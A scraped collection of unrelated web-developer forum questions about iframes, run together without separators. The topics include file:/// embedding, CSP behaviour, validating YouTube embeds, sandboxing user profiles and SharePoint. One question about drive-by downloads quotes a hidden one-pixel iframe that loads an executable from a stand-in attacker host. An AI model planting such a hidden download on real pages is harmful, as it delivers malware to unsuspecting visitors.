Yes, the browser and webserver are on the same machine!
Whenever I try to embed a HTML file from outside of the WWW root in an
iframe, thus using the
file:/// URL syntax, it is ignored. No error message logged or anything. Just nothing is done whatsoever.
If I change the path from
./blablabla.html, and put the file in the WWW root, it will display the HTML page in the iframe. So it’s not some kind of fundamental issue with displaying iframes or anything. I have tried both with and without URL-encoding the
IFRAMEs inherently unable to display
file:/// URIs, even though the MozDev page mentions no restrictions whatsoever for the
src attribute? https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
I am currently working on a project that uses iframes to distribute content to customers. Going ahead we would like to switch to a json based rest api to deliver the content. Api access would need a token to which specific content could be exposed and traffic limits set.
To replace the frontend appearance of the iframe I am thinking about writing a reusable bundle using a lightweight react alternative like preactjs. But this would mean exposing the raw api and the specific token to the end user. Simply routing user requests via the customers server would conceal the token but still allow raw api access to the enduser.
What would be a good architecture for such a use case?
Are there server side rendered solutions that can easily be implemented across a variety of backend frameworks, without rewriting everything for each customer that is?
Thanks for any advice
I’m building a part of a site where users can embed Youtube videos into their profile. I’m planning to have them get the embed iframe from Youtube directly, and submit that to our server. We’re then responsible for rendering it.
For completeness, a typical such iframe would look like this:
<iframe width="560" height="315" src="https://www.youtube.com/embed/ZK7ih4V0erc" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Of course, it would be bad to just take whatever HTML the user provides and render it verbatim. My question is: How much effort should I go to to verify this iframe is what I expect?
My approach at the moment is to parse whatever HTML they provide, and:
- Verify that the fragment is an iframe,
- Verify that the src attribute comes from Youtube.
Is there anything beyond this that I should be watching out for? I’m okay with them specifying a youtube video incorrectly (i.e. giving the ID for a video that doesn’t exist).
In the administration of advanced iframe I came across following:
“Please do not use a different protocol for the iframe: Do not mix HTTP and HTTPS if possible!”.
What does this mean? If the protocol of my page is HTTP than use an HTTP page inside the iframe. If the protocol of my page is HTTPS than use an HTTPS page inside the iframe.
We have below CSP derivatives defined in our site,
script-src 'self' 'unsafe-inline' 'unsafe-eval' *.youtube.com; style-src 'self' 'unsafe-inline'; frame-src *.facebook.com www.youtube.com;
As per this value, we only allowed facebook, youtube domains as src value in our site iframes. But we have below iframes rendered in our site.
<iframe id="EPFACLC-1579856043157" src="about:blank" frameborder="0" scrolling="no" title="chat widget"></iframe>
How this iframes are not restricted by the CSP rule?
Thanks in advance.
does the definition of a drive by download include malicious execution of an unaccepted downloaded file or is the unaccepted download of a file the drive by download by itself. I didn’t find a good/clear definition.
Why is it possible to download files with a hidden iframe, so the user isn’t even asked if he wants to download it. Something like this:
<iframe src="https://attacker.com/evil.exe" width="1" height="1" frameborder="0"></iframe>
Isnt this way to risky?
Thank you for your answers.
I there a way to insert iframes into articles using GSA or GSA content generator?
I want to embed Google properties like spreadsheets, google forms, google drive inside my GSA articles.
How to use ip Iframe on my site without risking for surfing ads by site users, safely?
Is iFrame a good way?
<iframe src="<?= $ url ?>" sandbox="???"></iframe>
What methods can be used for security?
Displaying ads (surfing) like EvolutionScript.
Site security and site users’ security are both important.
I’m using a video hosting service that provides me with embed codes for the videos: something like this:
<iframe title="Part 1" width="640" height="360" allowTransparency="true" mozallowfullscreen webkitallowfullscreen allowfullscreen style="background-color:transparent;" frameBorder="0" src="https://app.vidgrid.com/embed/--video-id--"></iframe>
This works totally fine if embedded by a contributor on a SharePoint page (clicking “Add A Page > insert > Embed Code”) because I have added the video’s domain (app.vidgrid.com) to the HTML Field Security allowed list. But. We have a Video Library (“Libraries > Training Video Library > Add > Video”) which also allows video iframes, but the contributor sees this error (works for me, as an admin):
My guess is, SharePoint isn’t using the HTML Field Security allowed domain list for this video embed piece. Is there any hope? 😀 Or does everyone just need to add a full page for each video, or download the video as an MP4 and re-upload it to sharepoint (works but clunky).
Currently, we have a small personal project which is meant to allow people to create ‘profiles’ in HTML/CSS. We aim to put all this generated content within a sandboxed iframe. The next point in discussion comes from allowing scripts in these iframes since users will be able to enter whatever content they want.
Couple things to note:
- All these iframes are hosted under the same subdomain
- The site has a cross-origin policy of : allow-all
- Authorization is handled through tokens stored within a React app. Not cookies.
I am mostly curious on the security risks of such a design and I have not found a clear concise answer. Should allow scripts within these iframes? or does this pose too much of a risk. What type of attacks are we looking at through an iframe? I am concerned mostly with XSS-type attacks. What about browser vulnerabilities with iframes?
Thanks! Any feedback would be greatly appreciated.